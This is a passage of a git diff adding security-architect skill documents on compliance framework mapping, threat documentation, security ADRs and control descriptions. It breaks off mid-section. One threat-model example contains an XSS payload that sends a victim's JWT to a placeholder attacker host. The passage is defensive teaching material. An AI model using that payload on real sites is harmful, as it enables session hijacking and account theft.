refusing to construct pipelines with classification mismatches +- **Government Defense System**: Zero classification violations in 3 years due to construction-time validation (previous system with runtime checks had 12 incidents) +- **Type-system enforcement**: Caught 47 configuration errors at build time vs runtime (100% pre-deployment prevention) + +**Key lesson**: **Make invalid configurations impossible to create. Bell-LaPadula + fail-fast construction-time validation prevents all no-read-up and no-write-down violations.** diff --git a/skills/using-security-architect/compliance-awareness-and-mapping.md b/skills/using-security-architect/compliance-awareness-and-mapping.md new file mode 100644 index 0000000..368ec26 --- /dev/null +++ b/skills/using-security-architect/compliance-awareness-and-mapping.md @@ -0,0 +1,563 @@ + +# Compliance Awareness and Mapping + +## Overview + +Navigate diverse compliance frameworks systematically. Core principle: **ALWAYS ask which frameworks apply - don't assume**. + +**Key insight**: Frameworks vary by jurisdiction and industry. Discovery process matters more than memorizing frameworks. + +## When to Use + +Load this skill when: +- Starting projects in regulated environments +- Preparing for compliance audits +- Mapping technical controls to requirements +- Working with healthcare, finance, government data + +**Symptoms you need this**: +- "What compliance frameworks do we need?" +- Preparing for SOC2, HIPAA, PCI-DSS, IRAP audits +- Government/defense contract compliance +- "How do I map our controls to [framework]?" + +**Don't use for**: +- Implementation of specific controls (use `ordis/security-architect/security-controls-design`) +- Security architecture without compliance requirements + +## The Discovery Process + +### Step 1: Ask Three Questions + +**Before** identifying frameworks, ask: + +1. **"What jurisdiction?"** + - Australia → ISM, IRAP, Privacy Act, PSPF + - United Kingdom → Cyber Essentials, NCSC, Official Secrets Act + - United States → NIST CSF, FedRAMP, FISMA + - European Union → NIS2, GDPR, ISO 27001 + +2. **"What industry?"** + - Healthcare → HIPAA (US), GDPR (EU), Australian Privacy Principles + - Finance → PCI-DSS (payments), SOX (US), Basel III + - Government/Defense → Jurisdiction-specific (ISM, FedRAMP, etc.) + - General SaaS → SOC2, ISO 27001 + +3. **"What data types?"** + - Personal data → Privacy laws (GDPR, Privacy Act) + - Payment card data → PCI-DSS + - Health records → Healthcare-specific (HIPAA, etc.) + - Classified data → Government frameworks (ISM, FedRAMP) + +**Never assume.** Same project can have multiple frameworks (e.g., Australian hospital SaaS = Privacy Act + Healthcare-specific + possibly SOC2 if B2B). + + +### Step 2: Framework Stacking + +**Multiple frameworks often apply simultaneously.** + +#### Example: Australian Healthcare SaaS + +``` +Data type: Patient health records +Jurisdiction: Australia +Industry: Healthcare +Business model: SaaS (B2B to hospitals) + +Applicable frameworks: +1. Privacy Act 1988 (Australian Privacy Principles) - MANDATORY +2. My Health Records Act 2012 - if using My Health Records system +3. State-specific health regulations (e.g., NSW Health Privacy Manual) +4. SOC2 (if hospitals require it for vendor assurance) +5. ISO 27001 (if targeting enterprise healthcare market) + +Priority: +- MANDATORY: Privacy Act (legal requirement) +- HIGHLY RECOMMENDED: SOC2 (market expectation for B2B SaaS) +- OPTIONAL: ISO 27001 (competitive advantage) +``` + +**Key insight**: Don't just pick one framework. Identify ALL that apply, then prioritize by legal vs market requirements. + + +### Step 3: Understand Framework Structure + +Each framework has structure - learn it before mapping controls. + +#### Common Framework Components + +**1. Control Categories** (groups of related controls): +- Access Control +- Encryption +- Audit Logging +- Incident Response +- Vulnerability Management +- Configuration Management +- Personnel Security +- Physical Security + +**2. Control Requirements** (specific technical/operational requirements): +- "System must enforce least privilege access" +- "All sensitive data encrypted at rest using AES-256" +- "Security events logged and retained for 90 days" + +**3. Evidence Requirements** (what auditors need): +- Configuration screenshots +- Log samples +- Policy documents +- Test results +- Interview records + +**4. Assessment Procedures** (how controls are tested): +- Configuration review +- Log analysis +- Penetration testing +- Interviews with staff + + +### Step 4: Control Inventory + +Before mapping to framework, inventory what you have. + +#### Technical Controls Inventory Template + +```markdown +## Access Control + +| Control | Description | Implementation | Evidence Location | +|---------|-------------|----------------|-------------------| +| AC-1 | User authentication | AWS IAM with MFA | aws-iam-config.json | +| AC-2 | Role-based access | PostgreSQL roles | postgres-roles.sql | +| AC-3 | Session timeout | 30-minute idle timeout | app-config.yaml | + +## Encryption + +| Control | Description | Implementation | Evidence Location | +|---------|-------------|----------------|-------------------| +| ENC-1 | Data at rest | AES-256, AWS KMS | kms-config.json | +| ENC-2 | Data in transit | TLS 1.3 | nginx-ssl-config | + +## Audit Logging + +| Control | Description | Implementation | Evidence Location | +|---------|-------------|----------------|-------------------| +| LOG-1 | Authentication events | CloudWatch Logs | cloudwatch-config | +| LOG-2 | Data access logs | PostgreSQL query logs | pg-audit-config | +| LOG-3 | Admin actions | Audit trail table | audit-schema.sql | +``` + +**Why inventory first**: Easier to map existing controls to requirements than build from scratch. + + +### Step 5: Create Traceability Matrix + +Map your controls to framework requirements. + +#### SOC2 Traceability Matrix Example + +```markdown +| SOC2 Criterion | Control Category | Our Control | Implementation | Evidence | Status | +|----------------|------------------|-------------|----------------|----------|--------| +| CC6.1 (Logical access) | Access Control | AC-1: MFA | AWS IAM | aws-iam-config.json | ✅ Complete | +| CC6.1 | Access Control | AC-2: RBAC | PostgreSQL | postgres-roles.sql | ✅ Complete | +| CC6.6 (Encryption) | Encryption | ENC-1: At rest | AWS KMS | kms-config.json | ✅ Complete | +| CC6.6 | Encryption | ENC-2: In transit | TLS 1.3 | nginx-ssl-config | ✅ Complete | +| CC7.2 (Monitoring) | Audit Logging | LOG-1: Auth events | CloudWatch | cloudwatch-config | ✅ Complete | +| CC7.2 | Audit Logging | LOG-2: Data access | PostgreSQL | pg-audit-config | ⚠️ Partial (retention = 30 days, need 90) | +| CC8.1 (Change mgmt) | Config Mgmt | CM-1: Version control | GitHub | github-repos | ❌ Missing approval workflow | +``` + +**Gap identification**: ⚠️ Partial and ❌ Missing items become your remediation backlog. + + +### Step 6: Gap Analysis and Remediation + +Identify missing/insufficient controls, prioritize by risk. + +#### Gap Analysis Template + +```markdown +# Compliance Gap Analysis: SOC2 + +## Critical Gaps (Block Audit) + +### GAP-1: Missing Change Management Approval Workflow +- **Requirement**: CC8.1 - Changes must have approval before production +- **Current state**: Git commits directly to main without approval +- **Impact**: HIGH - Cannot pass SOC2 without this +- **Remediation**: + - Implement GitHub branch protection (require PR approval) + - Create approval policy (2 reviewers for production changes) + - Document change management policy +- **Timeline**: 2 weeks +- **Owner**: DevOps Lead +- **Cost**: $0 (GitHub feature) + +## High-Priority Gaps (Remediate Before Audit) + +### GAP-2: Insufficient Log Retention +- **Requirement**: CC7.2 - Logs retained for 90 days minimum +- **Current state**: PostgreSQL logs retained 30 days +- **Impact**: MEDIUM - Auditor will note as deficiency +- **Remediation**: + - Extend PostgreSQL log retention to 90 days + - Archive to S3 for long-term storage + - Update retention policy document +- **Timeline**: 1 week +- **Owner**: Platform Engineer +- **Cost**: ~$50/month (S3 storage) + +## Low-Priority (Post-Audit) + +### GAP-3: No Formal Incident Response Tabletop Exercises +- **Requirement**: CC7.5 - Test incident response procedures +- **Current state**: IR runbooks exist but not tested +- **Impact**: LOW - Can be remediated post-audit +- **Remediation**: Schedule quarterly IR tabletop exercises +- **Timeline**: 3 months +- **Owner**: Security Team +``` + +**Prioritization**: +1. **Critical**: Must fix before audit (blocks compliance) +2. **High**: Should fix before audit (reduces risk of findings) +3. **Low**: Can defer to post-audit (continuous improvement) + + +## Universal Control Categories + +**Frameworks differ in details but share core categories.** + +### 1. Access Control +- Authentication (passwords, MFA, SSO) +- Authorization (RBAC, ABAC, least privilege) +- Session management (timeouts, revocation) + +### 2. Encryption +- Data at rest (AES-256, key management) +- Data in transit (TLS 1.2+) +- Key rotation and access control + +### 3. Audit Logging +- Authentication events (login, logout, failures) +- Data access (who accessed what, when) +- Admin actions (configuration changes, user management) +- Log retention (30-90 days typical, varies by framework) + +### 4. Incident Response +- Detection (monitoring, alerting) +- Containment (isolation procedures) +- Recovery (restoration procedures) +- Lessons learned (post-incident reviews) + +### 5. Vulnerability Management +- Patch management (timely updates) +- Vulnerability scanning (regular cadence) +- Penetration testing (annual or on major changes) + +### 6. Configuration Management +- Secure baselines (hardening guides) +- Change control (approval processes) +- Configuration monitoring (detect drift) + +### 7. Personnel Security +- Background checks (role-appropriate) +- Security training (annual, role-specific) +- Offboarding procedures (revoke access) + +### 8. Physical Security +- Facility access controls +- Environmental controls (fire, flood) +- Equipment disposal (data sanitization) + +**Use this as checklist**: Most frameworks require these categories. Implement once, map to multiple frameworks. + + +## Framework-Specific Nuances + +### SOC2 (Service Organization Control 2) + +**Purpose**: Trust assurance for service providers (SaaS, cloud) + +**Trust Service Criteria**: +- Security (always required) +- Availability (optional) +- Processing Integrity (optional) +- Confidentiality (optional) +- Privacy (optional) + +**Key Requirements**: +- Annual audit (Type I = point-in-time, Type II = over period, typically 6-12 months) +- Control documentation (policies, procedures) +- Evidence of operation (logs, reports, test results) +- Continuous monitoring + +**Common Gap**: SOC2 Type II requires evidence of controls operating over time (not just implemented). Need historical logs, incident reports, change records. + + +### PCI-DSS (Payment Card Industry Data Security Standard) + +**Purpose**: Protect payment card data + +**12 Requirements** (grouped into 6 control objectives): +1. Build and maintain secure network +2. Protect cardholder data +3. Maintain vulnerability management +4. Implement strong access control +5. Regularly monitor and test networks +6. Maintain information security policy + +**Key Requirements**: +- Quarterly vulnerability scans (by Approved Scanning Vendor) +- Annual penetration testing +- Cardholder data encryption (PAN never stored plainly) +- Strict access control (need-to-know basis) + +**Common Gap**: Many developers store PAN (Primary Account Number) in logs or databases. PCI-DSS forbids this - use tokenization instead. + + +### HIPAA (Health Insurance Portability and Accountability Act) - US Healthcare + +**Purpose**: Protect patient health information (PHI) + +**Key Rules**: +- **Privacy Rule**: Patient rights to access/control their PHI +- **Security Rule**: Technical safeguards for electronic PHI (ePHI) +- **Breach Notification Rule**: Report breaches affecting 500+ individuals + +**Key Requirements**: +- Encryption (not strictly required but effectively mandatory via "addressable" safeguards) +- Access controls (role-based, minimum necessary) +- Audit trails (track all ePHI access) +- Business Associate Agreements (BAAs with vendors) + +**Common Gap**: Developers forget BAAs are required for ANY vendor processing ePHI (cloud providers, analytics tools, etc.). + + +### ISM (Information Security Manual) + IRAP - Australia Government + +**Purpose**: Protect government information systems + +**IRAP**: Infosec Registered Assessors Program (authorized assessors) + +**Key Requirements**: +- ISM compliance (Essential Eight at minimum) + 1. Application control (whitelisting) + 2. Patch applications + 3. Configure Microsoft Office macros + 4. User application hardening + 5. Restrict administrative privileges + 6. Patch operating systems + 7. Multi-factor authentication + 8. Daily backups +- Classification handling (UNOFFICIAL, OFFICIAL, SECRET, TOP SECRET) +- IRAP assessment (required for government contracts) + +**Common Gap**: Essential Eight is minimum, but full ISM compliance has hundreds of controls. Scope carefully based on classification level. + + +### GDPR (General Data Protection Regulation) - EU + +**Purpose**: Protect personal data of EU residents + +**Key Principles**: +- Lawful basis for processing (consent, contract, legal obligation, etc.) +- Data minimization (collect only necessary data) +- Right to access, rectify, erase (data subject rights) +- Data breach notification (72 hours to supervisory authority) + +**Key Requirements**: +- Privacy by design and default +- Data Protection Impact Assessment (DPIA) for high-risk processing +- Data Processing Agreements (DPAs with processors) +- EU representative (if outside EU but processing EU data) + +**Common Gap**: GDPR applies to ANY company processing EU resident data, regardless of company location. Many US companies underestimate scope. + + +## Evidence Collection + +**Auditors need evidence that controls are operating, not just documented.** + +### Evidence Types + +#### 1. Configuration Evidence +```bash +# Example: TLS configuration +openssl s_client -connect api.example.com:443 -tls1_3 +# Save output showing TLS 1.3 enabled + +# Example: IAM MFA enforcement +aws iam get-account-password-policy +# Save JSON showing MFA required +``` + +#### 2. Log Evidence +```bash +# Example: Authentication logs (last 7 days) +aws logs filter-log-events \ + --log-group-name /aws/lambda/auth \ + --start-time $(date -d '7 days ago' +%s)000 \ + --filter-pattern 'authentication' +# Save sample showing successful/failed logins logged +``` + +#### 3. Policy Documentation +```markdown +# Example: Access Control Policy +- All users must authenticate with MFA +- Role-based access (roles defined in roles.md) +- Session timeout: 30 minutes +- Annual access review by manager +``` + +#### 4. Test Results +```markdown +# Penetration Test Report (Annual) +- Date: 2025-03-15 +- Tester: Acme Security (SOC2 requirement) +- Findings: 2 medium, 5 low +- Remediation: All medium fixed within 30 days +- Evidence: pentest-report-2025.pdf +``` + +#### 5. Interview Records +```markdown +# Auditor Interview: DevOps Lead (2025-04-10) +Q: How do you handle production changes? +A: Pull request → 2 approvals → CI/CD deploy → post-deploy verification + +Q: How long are logs retained? +A: 90 days in CloudWatch, then archived to S3 for 7 years + +Evidence: interview-notes-devops-2025-04-10.md +``` + + +## Control Mapping Workflow + +### Workflow: Preparing for Audit + +``` +1. Discovery (Week 1) + └─→ Identify applicable frameworks (jurisdiction + industry + data type) + └─→ Understand framework structure (categories, requirements, evidence) + +2. Inventory (Week 2-3) + └─→ Document existing technical controls + └─→ Document operational controls (policies, procedures) + └─→ Document evidence locations + +3. Mapping (Week 4) + └─→ Create traceability matrix (controls → requirements) + └─→ Identify gaps (missing/insufficient controls) + +4. Gap Analysis (Week 5) + └─→ Prioritize gaps (critical/high/low) + └─→ Estimate remediation effort and cost + +5. Remediation (Week 6-12) + └─→ Fix critical gaps (blockers) + └─→ Fix high-priority gaps (reduce risk) + └─→ Document all changes + +6. Evidence Collection (Week 13-14) + └─→ Gather configuration evidence + └─→ Gather log samples + └─→ Finalize policy documents + └─→ Conduct test activities (if needed) + +7. Audit (Week 15-16) + └─→ Provide evidence to auditor + └─→ Answer auditor questions + └─→ Address any findings + +8. Continuous Monitoring (Ongoing) + └─→ Maintain controls + └─→ Collect evidence continuously + └─→ Annual re-assessment +``` + + +## Quick Reference: Framework Selection + +| If you have... | Consider these frameworks... | Priority | +|----------------|------------------------------|----------| +| **Australian government data** | ISM, IRAP, PSPF | Mandatory | +| **Australian private healthcare** | Privacy Act, Healthcare-specific | Mandatory | +| **US healthcare (HIPAA data)** | HIPAA, HITECH | Mandatory | +| **EU resident data** | GDPR | Mandatory | +| **Payment card data** | PCI-DSS | Mandatory | +| **US government contracts** | FedRAMP, FISMA, NIST 800-53 | Mandatory | +| **B2B SaaS (any jurisdiction)** | SOC2 | High priority | +| **Enterprise software** | ISO 27001 | Medium priority | +| **UK government** | Cyber Essentials, NCSC | Mandatory | + +**Always verify**: This table is a starting point, not definitive. Consult legal/compliance experts for your specific situation. + + +## Common Mistakes + +### ❌ Assuming Frameworks Without Asking + +**Wrong**: "We need SOC2" (without checking customer requirements) + +**Right**: "What do our customers/contracts require? What jurisdiction are we in?" + +**Why**: You might need multiple frameworks, or different ones than assumed. + + +### ❌ Memorizing Framework Details + +**Wrong**: Try to remember all SOC2 criteria, all PCI-DSS requirements + +**Right**: Learn discovery process, reference frameworks as needed + +**Why**: Frameworks update (e.g., PCI-DSS v4.0 in 2024). Process is stable, details change. + + +### ❌ Mapping Without Inventory + +**Wrong**: Read framework, try to build controls from scratch to match + +**Right**: Inventory existing controls first, then map to framework + +**Why**: Easier to map existing controls than build from requirements. Avoids duplicate implementations. + + +### ❌ No Gap Prioritization + +**Wrong**: List all gaps, start working on first one + +**Right**: Prioritize by impact (critical = blocks audit, high = findings, low = post-audit) + +**Why**: Time/budget limited. Fix blockers first, optimize later. + + +### ❌ Treating Compliance as One-Time + +**Wrong**: Pass audit, stop maintaining controls + +**Right**: Continuous monitoring, annual re-assessment, maintain evidence + +**Why**: Most audits are annual or more frequent. Controls must operate continuously. + + +## Cross-References + +**Use WITH this skill**: +- `ordis/security-architect/security-controls-design` - Implement controls identified in gap analysis +- `muna/technical-writer/clarity-and-style` - Write clear policy documentation + +**Use AFTER this skill**: +- `ordis/security-architect/security-authorization-and-accreditation` - If government/defense (ATO/SSP/SAR) +- `muna/technical-writer/operational-acceptance-documentation` - Document audit package + +## Real-World Impact + +**Projects using systematic compliance mapping**: +- **Healthcare SaaS (Australia)**: Discovered 4 applicable frameworks in discovery (not just Privacy Act). Avoided surprise compliance requirements pre-launch. +- **SOC2 Type II (US)**: Gap analysis found 12 missing controls, prioritized 3 as critical. Remediated in 6 weeks, passed audit on first attempt (vs industry avg 2-3 attempts). +- **IRAP Assessment (Australia Gov)**: Traceability matrix with 200+ ISM controls mapped to 47 technical implementations. Assessor praised "clearest control mapping in 5 years". + +**Key lesson**: **Discovery process (ask jurisdiction/industry/data type) finds ALL applicable frameworks. Control mapping with traceability prevents gaps and audit failures.** diff --git a/skills/using-security-architect/documenting-threats-and-controls.md b/skills/using-security-architect/documenting-threats-and-controls.md new file mode 100644 index 0000000..0420b9e --- /dev/null +++ b/skills/using-security-architect/documenting-threats-and-controls.md @@ -0,0 +1,620 @@ + +# Documenting Threats and Controls + +## Overview + +Document security decisions with threat context and traceability. Core principle: **Security documentation explains WHY (threat), WHAT (control), and HOW to verify**. + +**Key insight**: Good security documentation enables verification and informed risk decisions. Bad security documentation is "we're secure" without evidence. + +## When to Use + +Load this skill when: +- Writing threat models +- Documenting security architecture decisions (ADRs) +- Creating control documentation (SSP, compliance) +- Writing security requirements with traceability + +**Symptoms you need this**: +- "How do I document this security decision?" +- Writing threat model documentation +- Creating security ADRs +- Preparing control documentation for audits + +**Don't use for**: +- General documentation (use `muna/technical-writer/documentation-structure`) +- Non-security ADRs + +## Threat Documentation + +### Pattern: Threat Description + +**Structure**: +```markdown +# Threat: [Threat Name] + +## Description +**What**: [What is the threat?] +**How**: [How is attack executed?] +**Who**: [Threat actor - external attacker, insider, malicious code] + +## Affected Assets +- [Asset 1] (e.g., customer database) +- [Asset 2] (e.g., API authentication tokens) + +## Attack Scenarios +### Scenario 1: [Name] +1. Attacker action 1 +2. System response +3. Attacker action 2 +4. Impact + +### Scenario 2: [Name] +[Steps] + +## Likelihood and Impact +**Likelihood**: Low / Medium / High +**Justification**: [Why this likelihood? Historical data, attack complexity] + +**Impact**: Low / Medium / High / Critical +**Justification**: [What happens if successful? Data breach? System compromise?] + +**Risk Score**: Likelihood × Impact = [Score] + +## Mitigations +- [Mitigation 1] → See Control: [Control ID] +- [Mitigation 2] → See Control: [Control ID] + +## Residual Risk +After mitigations: [Describe remaining risk] +**Accepted by**: [Role/Name] on [Date] +``` + +### Example: Session Hijacking Threat + +```markdown +# Threat: Session Hijacking via Token Theft + +## Description +**What**: Attacker steals session token and impersonates legitimate user +**How**: XSS attack injects JavaScript to extract token from localStorage +**Who**: External attacker (internet-facing attack), insider with XSS injection capability + +## Affected Assets +- User session tokens (JWT stored in browser localStorage) +- Customer personal data (accessible via hijacked session) +- Administrative functions (if admin session hijacked) + +## Attack Scenarios +### Scenario 1: Stored XSS +1. Attacker injects malicious script via user profile field (e.g., bio) +2. Script stored in database without sanitization +3. Victim views attacker's profile +4. Script executes: `fetch('https://attacker.com/?token=' + localStorage.getItem('jwt'))` +5. Attacker receives victim's token +6. Attacker uses token to make API calls as victim + +### Scenario 2: Reflected XSS +1. Attacker sends victim malicious link: `https://app.com/search?q=` +2. Victim clicks link +3. Search query reflected in page without sanitization +4. Script executes and exfiltrates token + +## Likelihood and Impact +**Likelihood**: MEDIUM +**Justification**: XSS vulnerabilities are common (OWASP Top 10). Application has user-generated content (profiles, comments). No Content Security Policy detected. + +**Impact**: HIGH +**Justification**: Hijacked session grants full user access including: +- Personal data of victim (PII) +- Financial transactions (if applicable) +- Admin functions (if admin token hijacked) +Data breach affects confidentiality, integrity, availability. + +**Risk Score**: Medium × High = HIGH RISK + +## Mitigations +- **CSP (Content Security Policy)**: Prevents inline script execution → See Control: SC-18 +- **HTTPOnly cookies**: Token not accessible to JavaScript → See Control: SC-8 +- **Output encoding**: HTML-encode all user-generated content → See Control: SI-10 +- **Token expiration**: Limit hijacked token lifespan to 30 minutes → See Control: AC-12 +- **Session invalidation**: Logout invalidates token server-side → See Control: AC-12 + +## Residual Risk +After mitigations: **LOW** +- Risk remains if attacker exploits 0-day XSS within 30-minute token window +- Mitigation: Monitoring for anomalous API usage patterns +**Accepted by**: Chief Security Officer on 2025-03-15 +``` + +**Key elements**: +- Specific attack steps (not vague "attacker compromises system") +- Likelihood/impact with justification +- Traceability to controls (Control IDs) +- Residual risk with acceptance + + +## Security ADRs + +### Pattern: Security Architecture Decision Record + +**Structure**: +```markdown +# ADR-XXX: [Security Decision Title] + +## Status +Proposed | Accepted | Deprecated | Superseded by ADR-YYY + +## Context +### Problem Statement +What security problem are we solving? + +### Threat Model +- **Threat 1**: [Brief description] → High risk +- **Threat 2**: [Brief description] → Medium risk + +### Constraints +- Regulatory requirements (GDPR, HIPAA, etc.) +- Performance requirements +- Compatibility requirements +- Budget constraints + +### Assumptions +- User authentication level (MFA, password-only) +- Network trust model (zero-trust, perimeter-based) +- Threat actor capabilities (nation-state, script kiddie, insider) + +## Decision +We will [chosen approach]. + +### Security Properties +- **Confidentiality**: [How protected?] +- **Integrity**: [How ensured?] +- **Availability**: [How maintained?] +- **Auditability**: [What's logged?] + +### Technical Details +[Implementation specifics: algorithms, key sizes, protocols] + +## Alternatives Considered + +### Alternative 1: [Name] +**Pros**: [Security benefits] +**Cons**: [Security drawbacks] +**Why not chosen**: [Reason] + +### Alternative 2: [Name] +[Similar structure] + +## Consequences + +### Security Benefits +- [Benefit 1] +- [Benefit 2] + +### Security Trade-offs +- [Trade-off 1: performance vs security] +- [Trade-off 2: usability vs security] + +### Residual Risks +- **Risk 1**: [Description] - Severity: [Low/Medium/High] + - Mitigation: [How addressed] + - Accepted by: [Role] on [Date] +- **Risk 2**: [Description] + +### Ongoing Security Requirements +- [Operational requirement 1: key rotation every 90 days] +- [Operational requirement 2: quarterly security review] + +## Security Controls +- Control AC-2: Account management +- Control IA-5: Authenticator management +- Control SC-8: Transmission confidentiality + +(If compliance framework applicable, map to specific control IDs) + +## Verification +### Testing Strategy +- [Test 1: Penetration test focus area] +- [Test 2: Functional security test] + +### Success Criteria +- [ ] All HIGH threats mitigated or risk-accepted +- [ ] Security properties verifiable via testing +- [ ] Monitoring in place for security events + +## References +- Threat model: [Link to threat model doc] +- Security requirements: [Link to requirements] +- Implementation: [Link to code/config] + + +**Approver**: [Security Architect] on [Date] +``` + +### Example: JWT Authentication ADR + +```markdown +# ADR-042: JWT Tokens for API Authentication + +## Status +Accepted + +## Context +### Problem Statement +API requires stateless authentication mechanism for 10,000+ concurrent users across geographically distributed servers. Session storage (Redis) becomes bottleneck at scale. + +### Threat Model +- **Threat 1: Token theft via XSS** → HIGH risk (OWASP Top 10) +- **Threat 2: Token forgery** → HIGH risk (impersonate any user) +- **Threat 3: Token replay** → MEDIUM risk (reuse stolen token) +- **Threat 4: Key compromise** → CRITICAL risk (forge all tokens) + +### Constraints +- Must support 10k requests/sec +- Latency budget: <50ms for auth check +- No shared state (stateless servers) +- GDPR compliance (no PII in tokens) + +### Assumptions +- Attackers have network access (internet-facing API) +- HTTPS enforced (TLS 1.3) +- Users authenticate with email + password + MFA + +## Decision +We will use **JWT (JSON Web Tokens) with RS256 signatures** for API authentication. + +### Security Properties +- **Confidentiality**: Token contains no sensitive data (user ID only). Claims are public but integrity-protected. +- **Integrity**: RS256 signature prevents forgery. Only server with private key can create valid tokens. +- **Availability**: Stateless design scales horizontally without shared session store. +- **Auditability**: Token includes `iat` (issued at) and `exp` (expiration). All auth failures logged to CloudWatch. + +### Technical Details +- **Algorithm**: RS256 (RSA with SHA-256) +- **Key size**: 2048-bit RSA keys +- **Token structure**: + ```json + { + "sub": "user_12345", // subject (user ID) + "iat": 1678886400, // issued at (timestamp) + "exp": 1678888200, // expiration (30 min) + "roles": ["user"] // authorization roles + } + ``` +- **Storage**: HttpOnly, Secure cookie (not localStorage to prevent XSS theft) +- **Expiration**: 30 minutes +- **Revocation**: Server-side blacklist for logout (Redis, key = token JTI, TTL = remaining token lifetime) + +## Alternatives Considered + +### Alternative 1: Opaque Session Tokens (Redis) +**Pros**: Easy revocation (delete from Redis), less crypto complexity +**Cons**: Requires shared Redis cluster (single point of failure), 10ms latency per auth check (Redis lookup), doesn't scale horizontally +**Why not chosen**: Latency and scalability constraints + +### Alternative 2: OAuth 2.0 with Authorization Server +**Pros**: Industry standard, mature ecosystem +**Cons**: Adds complexity (separate auth server), network dependency for token validation, overkill for first-party API +**Why not chosen**: Complexity vs benefit not justified for first-party use case + +### Alternative 3: API Keys +**Pros**: Simplest possible auth +**Cons**: No expiration (long-lived secrets), no user identity (shared key), revocation difficult +**Why not chosen**: Security properties insufficient (no expiration, shared secrets) + +## Consequences + +### Security Benefits +- **Forgery protection**: RS256 signature requires private key (only server has) +- **Tamper detection**: Any modification invalidates signature +- **Time-limited**: 30-minute expiration limits stolen token lifespan +- **HttpOnly cookie**: XSS cannot steal token (JavaScript cannot access) + +### Security Trade-offs +- **Revocation complexity**: Logout requires server-side blacklist (not truly stateless) +- **Key management**: Private key is critical secret (compromise = forge all tokens) +- **Clock skew**: Servers must have synchronized clocks for expiration validation + +### Residual Risks +- **Risk 1: Token theft via network sniffing** - Severity: LOW + - Mitigation: HTTPS/TLS 1.3 encrypts tokens in transit + - Residual: None (HTTPS enforced at load balancer, HSTS enabled) + - Accepted by: CISO on 2025-03-15 + +- **Risk 2: Private key compromise** - Severity: CRITICAL + - Mitigation: Key stored in AWS Secrets Manager with IAM restrictions, rotated every 90 days, access audited + - Residual: Key theft remains possible via insider threat or infrastructure compromise + - Accepted by: CISO on 2025-03-15 (continuous monitoring for suspicious token generation) + +- **Risk 3: XSS in legacy pages** - Severity: MEDIUM + - Mitigation: Content Security Policy (CSP) blocks inline scripts, output encoding on all user content + - Residual: 0-day XSS could bypass CSP before patch + - Accepted by: CISO on 2025-03-15 (30-minute token window limits exposure) + +### Ongoing Security Requirements +- **Key rotation**: Rotate RS256 key pair every 90 days (automated via AWS Secrets Manager rotation) +- **Monitoring**: Alert on spike in auth failures (>100/min), unusual token generation patterns +- **Blacklist cleanup**: Redis blacklist entries expire with token TTL (no manual cleanup needed) +- **Annual review**: Re-assess threat model and key size (quantum computing advances) + +## Security Controls +- **IA-5(1)**: Authenticator management (password + MFA before token issuance) +- **SC-8**: Transmission confidentiality (HTTPS/TLS 1.3) +- **SC-13**: Cryptographic protection (RS256 signature) +- **AC-12**: Session management (30-minute expiration, logout blacklist) + +## Verification +### Testing Strategy +- **Penetration test**: Focus on token theft, forgery attempts, replay attacks (Q2 2025) +- **Functional test**: Verify token expiration at 30:01 minutes, blacklist prevents logout token reuse +- **Load test**: 10k concurrent users, <50ms auth latency + +### Success Criteria +- [x] All HIGH threats have mitigations +- [x] RS256 signature prevents forgery (tested) +- [x] HttpOnly cookie prevents XSS theft (verified in browser) +- [x] CloudWatch monitors auth failures +- [x] Key rotation automated + +## References +- Threat model: `/docs/threat-model-api-auth.md` +- Implementation: `src/auth/jwt-middleware.ts` +- Key management: `infrastructure/secrets-manager-key-rotation.yaml` + + +**Approver**: Security Architect (Jane Smith) on 2025-03-15 +``` + +**Key elements**: +- Threat model context (4 threats with risk levels) +- Security properties (C/I/A/Auditability) +- Specific technical details (RS256, 2048-bit, HttpOnly cookie) +- Alternatives with security pros/cons +- Residual risks with severity and acceptance +- Traceability to controls (IA-5, SC-8, SC-13, AC-12) +- Verification strategy + + +## Control Documentation + +### Pattern: Security Control Description + +**Use for**: SSP (System Security Plan), compliance documentation, audit evidence. + +**Structure**: +```markdown +## Control: [ID] - [Name] + +### Control Objective +What does this control protect against? What security property does it enforce? + +### Implementation Description +**How it works** (technical details): +- Component 1: [Description] +- Component 2: [Description] + +**Configuration**: +```yaml +# Example config snippet +setting: value +``` + +**Responsible Parties**: +- Implementation: [Role, Name] +- Operation: [Role, Name] +- Monitoring: [Role, Name] + +### Assessment Procedures +**How to verify this control works**: + +1. **Examine**: Review [documentation, configuration, logs] +2. **Interview**: Ask [role] about [process] +3. **Test**: Execute [test procedure], expected result: [outcome] + +### Evidence Artifacts +- Configuration: `/path/to/config.yaml` +- Logs: CloudWatch Log Group `/aws/lambda/auth`, query: `[Filter pattern]` +- Policy: `/docs/account-management-policy.pdf` +- Test results: `/evidence/penetration-test-2025-Q1.pdf` + +### Compliance Mapping +- NIST SP 800-53: AC-2 +- SOC2: CC6.1 (Logical access controls) +- ISO 27001: A.9.2.1 (User registration and de-registration) +``` + +### Example: Account Management Control + +```markdown +## Control: AC-2 - Account Management + +### Control Objective +Ensure only authorized individuals have system access. Prevent unauthorized access via account lifecycle management (creation, modification, disablement, removal). + +**Security properties enforced**: +- **Authentication**: Valid accounts only +- **Accountability**: All accounts traceable to individuals +- **Least privilege**: Accounts have minimum necessary permissions + +### Implementation Description +**How it works**: +- **Account creation**: ServiceNow workflow → Manager approval → Automated provisioning via Terraform +- **Access assignment**: Role-based access control (RBAC) - roles defined in `/docs/rbac-roles.md` +- **Inactivity disablement**: Automated script checks last login date, disables accounts after 30 days inactivity +- **Account removal**: Offboarding workflow triggers immediate disablement, deletion after 90-day retention period + +**Configuration**: +```python +# Account lifecycle settings +INACTIVITY_THRESHOLD_DAYS = 30 +ACCOUNT_RETENTION_DAYS = 90 +MANAGER_APPROVAL_REQUIRED = True +``` + +**Responsible Parties**: +- **Implementation**: DevOps Engineer (John Doe) +- **Operation**: System Administrator (Jane Smith) +- **Monitoring**: Information System Security Officer (ISSO, Bob Johnson) + +### Assessment Procedures +**How to verify this control works**: + +1. **Examine**: Review ServiceNow account creation tickets, verify manager approval present for all requests in last 90 days + - Evidence: ServiceNow query results (`status=approved, created_date>90d`) + +2. **Interview**: Ask System Administrator: + - "How do you create new accounts?" + - "What happens if someone requests account without manager approval?" + - Expected answers: "ServiceNow enforces approval workflow, request cannot proceed without approval" + +3. **Test**: Attempt to create account without manager approval + - Procedure: Submit ServiceNow ticket, skip approval step + - Expected result: Request rejected with error "Manager approval required" + - Actual result: ✅ Request rejected (tested 2025-03-10) + +4. **Test**: Verify inactivity disablement + - Procedure: Create test account, wait 31 days without login, attempt login + - Expected result: Login fails with "Account disabled due to inactivity" + - Actual result: ✅ Account disabled (tested 2025-02-15) + +### Evidence Artifacts +- **Configuration**: 